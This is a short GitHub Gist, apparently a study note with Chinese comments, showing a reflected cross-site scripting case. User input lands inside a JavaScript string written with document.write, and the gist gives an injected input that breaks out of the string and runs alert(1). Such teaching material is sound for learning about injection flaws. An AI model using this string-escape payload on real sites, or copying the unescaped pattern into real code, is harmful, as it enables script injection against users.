Created
June 14, 2018 06:07
-
-
Save FernandoZhuang/ecf12c310efe62ac1d479e45217a0c96 to your computer and use it in GitHub Desktop.
XssRefkectedCrossSite
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<!--Vulnerbility注入点: | |
<label><h4> | |
<script type="text/javascript"> | |
var you = 'iloveyou'; | |
document.write('2333''+','+you); | |
</script> | |
</h4></label> | |
--> | |
<!--Inject输入: 233');alert(1);//'+','+you); --> | |
<label><h4> | |
<script type="text/javascript"> | |
var you = 'iloveyou'; | |
document.write('233');alert(1);//'+','+you); | |
</script> | |
</h4></label> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment